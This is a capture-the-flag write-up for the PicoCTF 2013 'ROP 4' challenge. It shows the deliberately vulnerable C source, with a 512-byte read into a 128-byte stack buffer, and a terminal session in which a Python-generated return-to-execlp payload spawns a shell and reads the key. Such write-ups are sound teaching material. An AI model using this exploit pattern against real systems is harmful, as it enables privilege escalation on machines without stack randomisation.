# PicoCTF 2k13 - ROP 4

`vulnerable_function` lets `read()` write up to 512 bytes into a 128-byte stack buffer, so the saved return address can be overwritten from stdin. Instead of chaining the two `call_me_*` gadgets (as written both `strcpy` from offset 0 of `exec_string`, so they never combine into `/bin/sh`), the payload below returns straight into `execlp` after 140 bytes of padding: on the 32-bit x86 stack the next word is a dummy return address, the word after it is execlp's `file` argument (a pointer into the process environment at the value of `SHELL`; 0xffffd887 is 6 bytes past the address reported by the env-lookup tool, presumably to skip the `SHELL=` prefix), and the four zero bytes end the variadic argument list. Hard-coding a stack address like this only works because the challenge's stack is not randomised.

$ cat /problems/ROP_4_887f7f28b1f64d7e/rop4.c
#include <stdio.h>
#include <unistd.h>
#include <string.h>

/* Path handed to execlp() by exec_the_string(). Cleared in main(); each
 * call_me_* gadget strcpy()s its piece starting at offset 0, so the two
 * pieces overwrite rather than append to each other. */
char exec_string[20];

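/*
 * Exec whatever path exec_string currently holds, using it as argv[0] too.
 *
 * execlp() is variadic, so the argument-list terminator must have pointer
 * type: a bare NULL may expand to a plain integer 0, which is undefined
 * behaviour wherever int and char * differ in size. The explicit (char *)
 * cast makes the sentinel correct on every ABI (it is a no-op on the 32-bit
 * target this challenge runs on).
 *
 * Because this is the "p" variant, a string without a '/' is resolved via
 * PATH. execlp() only returns on failure; as in the original there is no
 * error path here, the function simply returns to its caller.
 */
void exec_the_string() {
 execlp(exec_string, exec_string, (char *)NULL);
}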

/*
 * ROP gadget: when called with the magic value 0xcafebabe, overwrite the
 * global exec_string with "/sh". Any other argument is a no-op.
 *
 * The constant 0xcafebabe has type unsigned int, so the int argument is
 * compared after conversion to unsigned, exactly as the original did.
 * strcpy() writes from the start of exec_string, so this replaces rather
 * than appends to anything call_me_with_two_args() stored there.
 */
void call_me_with_cafebabe(int cafebabe) {
 if ((unsigned int)cafebabe != 0xcafebabeU) {
  return;
 }
 strcpy(exec_string, "/sh");
}

/*
 * ROP gadget: when called with (0xdeadbeef, 0xcafebabe), overwrite the
 * global exec_string with "/bin". Any other pair of arguments is a no-op.
 *
 * Both magic constants are unsigned int, so the int arguments are compared
 * after conversion to unsigned, as in the original. strcpy() writes from
 * offset 0 of exec_string, so this does not append to "/sh" from the other
 * gadget; whichever gadget runs last wins.
 */
void call_me_with_two_args(int deadbeef, int cafebabe) {
 const unsigned int first = (unsigned int)deadbeef;
 const unsigned int second = (unsigned int)cafebabe;
 if (second != 0xcafebabeU || first != 0xdeadbeefU) {
  return;
 }
 strcpy(exec_string, "/bin");
}

/*
 * The intentional bug: buf is 128 bytes but read() may write up to 512, so
 * a long stdin payload runs past buf into the saved frame pointer and return
 * address. The return value of read() is ignored as well. The exploit below
 * sends 140 bytes of padding before the bytes that land on the saved return
 * address; that offset depends on this exact frame layout, which is why the
 * code is left byte-identical here.
 */
void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 512);
}

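/*
 * Keep the effective group id across an exec of a shell.
 *
 * /bin/sh is usually symlinked to bash, which drops privileges when its real
 * and effective gids differ. Setting real, effective and saved gid all to the
 * current effective gid makes them agree, so the spawned shell keeps whatever
 * group this binary runs with (presumably a setgid bit that grants access to
 * the key; only the gid is adjusted, not the uid).
 *
 * setresgid() can fail (e.g. EPERM). The original discarded the result; the
 * failure is now reported on stderr but execution continues as before, since
 * nothing after this depends on the call having succeeded.
 */
void be_nice_to_people() {
 gid_t gid = getegid();
 if (setresgid(gid, gid, gid) != 0) {
  perror("setresgid");
 }
}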

/*
 * Challenge entry point: reset the command string, keep our gid for the
 * shell that a successful exploit will exec, then read the payload.
 * argc/argv are unused; falling off the end of main returns 0 in C99+,
 * which is spelled out explicitly here.
 */
int main(int argc, char** argv) {
 (void)argc;
 (void)argv;
 /* Start from an empty command string; the ROP gadgets fill it in. */
 exec_string[0] = '\0';
 /* Make real gid match effective gid so an exec'd bash keeps the group. */
 be_nice_to_people();
 /* Read the attacker-controlled input (the overflow lives in here). */
 vulnerable_function();
 return 0;
}
$ ln -s /problems/ROP_4_887f7f28b1f64d7e/rop4 rop4
$ ./getenvadrr SHELL ./rop4
SHELL will be at 0xffffd881
$ objdump -t rop4 | grep execlp
08053ab0 g     F .text 0000012a execlp
$ (python -c 'print "\x90"*140 + "\xb0\x3a\x05\x08" + "\x87\xd8\xff\xff"*2 + "\x00"*4'; cat) | ./rop4
cat /problems/ROP_4_887f7f28b1f64d7e/key
fluent_in_roponese
